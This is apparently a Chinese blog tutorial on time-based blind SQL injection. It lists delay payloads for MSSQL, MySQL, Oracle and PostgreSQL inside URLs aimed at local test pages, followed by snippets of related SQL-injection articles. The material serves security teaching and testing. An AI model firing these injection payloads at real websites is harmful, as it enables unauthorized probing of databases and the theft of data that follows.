SQL盲注(2)

最新推荐文章于 2025-02-13 23:37:55 发布
最新推荐文章于 2025-02-13 23:37:55 发布
阅读量122 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: 数据库 php
原文链接:http://www.cnblogs.com/dubhe-/p/10040038.html
本文介绍了一种在SQL注入攻击中使用时间延迟技巧的方法,通过向数据库注入特定命令使服务器延时响应,以此验证Web应用是否存在漏洞。文章详细列举了在MSSQL、MySQL、OraclePL/SQL及PostgreSQL等不同数据库中实现时间延迟的具体操作。

时间延迟

测试SQL注入漏洞时,会发现某一潜在漏洞难以确定,主要原因是Web应用没有显示任何错误,因而无法检索任何数据。这种情况下,可以考虑向数据库注入时间延迟。MSSQL服务器有一条内置命令waitfor delay 'hours:minutes:seconds'

http://127.0.0.1/test.apsx?id=1;waitfor delay '0:0:5' -- 
该请求会使服务器延时5秒

MySQL中没有能直接延时的函数,但可以使用执行时间很长的函数来实现延迟,MySQL的benchmark函数就可以实现。

http://127.0.0.1/test/php?id=1;select benchmark(10000000,encode('hello','test'));--

在Oracle PL/SQL中,可以利用以下指令集来延迟5秒

begin
dbms_lock.sleep(5)
end;

但是,该函数的使用存在很多限制。1.不能直接将该函数注入到子查询中,因为Oracle不支持堆叠查询。2.只有数据库管理员才能使用dbms_lock包

在Oracle PL/SQL中还有另外一种方式

http://127.0.0.1/test.php?id=1 or 1=dbms_pipe.receive_message('RDS',10)

dbms_pipe.receive_message函数将为从RDS管道返回的数据等待10秒。默认情况下,允许public权限执行该包。dbms_lock.sleep与之相反,dbms_pipe。receive_message可以直接用到SQL语句中。

PostgreSQL数据库可以使用pg_sleep函数来实现延迟

http://127.0.0.1/test.php?id=1;select pg_sleep(10); --
dbms_pipe.receive_message

转载于:https://www.cnblogs.com/dubhe-/p/10040038.html

77.网络安全渗透测试—[SQL入篇16]—[SQLSERVER+ASP-延时入]
qwsn
01-19 4686
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、SQLSERVER+ASP 延时1、简介 2判断入 3、猜解长度、个数、字符 4、以上总结:`12步` 5、思考1:`information_schema的区别` 6、思考2:`如何一次查询当前库的所有表长度` 7、简化延时入步骤:`9步(省略了判断个数的步骤)`
SQL-实战布尔
dkxkl1314的博客
03-09 3394
环境:win10靶场:sqli-labs-master就是在SQL入过程中,SQL语句执行后,查询到的数据不能 回显到前端页面。此时,我们需要利用一些方法进行判断或者尝 试,这个过程称之为。而布尔就是SQL语句执行后,页面 不返回具体数据,数据库只返回0或者1(真or假)。类似于无法开口说话的人,只能通过点头和摇头来告诉你答案的正 确与否。在页面中,如果正确执行了用户构造的SQL语句,则返回一种页 面,如果 SQL语句执行错误,则执行另一种页面。
WAITFOR延迟语句
ahao214——Dreamspace
06-12 1648
语法格式: WAITFOR { DELAY 具体时间 | Time 具体时间 } waitfor delay '00:00:05' select * from tableName delay 后面的时间是等待多久才执行SQL语句 time——后面的时间是到具体的几点几分才执行SQL语句
Sqlserver延时执行方法
胡杰的专栏
07-14 2577
有时为了在指定的时间去执行一个sql语句,用这个函数就很方便,直接上代码。delay: 就是等待多少时间后执行,时长24小时内。time: 就是在指定时间点执行。
sql延迟执行
baidu_29385797的博客
04-23 2079
sql延迟执行 USE [CNPC_GasDataReport] GO /****** Object: StoredProcedure [dbo].[db_News_Info] Script Date: 04/23/2021 10:06:05 ******/ SET ANSI_NULLS ON GO SET QUOTED_IDENTIFIER ON GO --创建存储过程 ALTER procedure [dbo].[db_News_Info] @CategoryID varchar(20),...
sqlserver延迟执行
问道于旁
05-11 977
WAITFOR DELAY '00:00:03' --延时3后执行
DVWA-SQL脚本(全)
10-04
DVWA SQL,Low,Medium,High 三个级别的bool脚本,比较完整,配套解释 : https://blog.youkuaiyun.com/csdn_Pade/article/details/82886765
BurpSuite辅助SQL安装教程
03-10
BurpSuite辅助SQL安装教程
SQLpython代码
最新发布
夏炎正好眠
02-13 581
布尔和时间的代码
python编写的sql
10-28
python编写的sql
waitfor延迟执行语句 sql server
08-24
waitfor延迟执行语句 sql server
【干货实战】SQL太慢,教你调优三板斧-Select篇
大鹏的博客
06-27 3152
实战教学慢SQL调优,干货满满,让你从入门到资深,一招鲜
漏洞复现--捷诚管理信息系统多处SQL
qq_53003652的博客
11-22 424
捷诚管理信息系统是一款功能全面,可以支持自营、联营到外柜租赁的管理,其自身带工作流管理工具,能够帮助企业有效的开展内部审批工作。该产品CWSFinanceCommon.asmx、CWSHr.asmx、cwsoa.asmx多处接口存在SQL入。联系厂家获取修复补丁。
mysql 时间_时间类插件
weixin_39898380的博客
01-27 259
时间类插件这一类的入在返回页面中没有回显,但可以根据返回页面的结果判断构造的SQL条件语句的真假性。实例范例插件:#!/usr/bin/env python# -*- coding: utf-8 -*-def assign(service, arg):if service == fingerprint.weaver_e_office:return True, argdef time_sql(...
执行Sqlserver中waitfor delay延时操作或waitfor time定时操作
Andrewniu的博客
05-18 5445
private static string connectionString = RBAC.Dal.DataRootBase.ConnectionString;private SqlConnection mConnection = new SqlConnection(connectionString);#region/// <summary>/// 当点击执行查询时发生(异步操作) /...
MSSQL
fireman
06-22 1081
一些sql扩展 xp_regaddmultistring xp_regdeletekey 删除键名 xp_regdeletevalue 删除键值 xp_regenumkeys 枚举 xp_regenumvalues xp_regread 对于 xp_regremovemultistring xp_regwrite 写 xp_availablemedia 查看驱动器 xp_dirtree 看目录 x
SQL中waitfor delay语句
最有趣的编程
02-28 7521
SQL攻击技术详解
"这篇文档是关于SQL攻击技术的综述,由Javaphile撰写,适合学习数据库安全的人员阅读。文章首先定义了SQL入及其风险,并回顾了现有的解决方案及其不足。接着,它讨论了在服务器仅给出最小响应的情况下如何识别...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值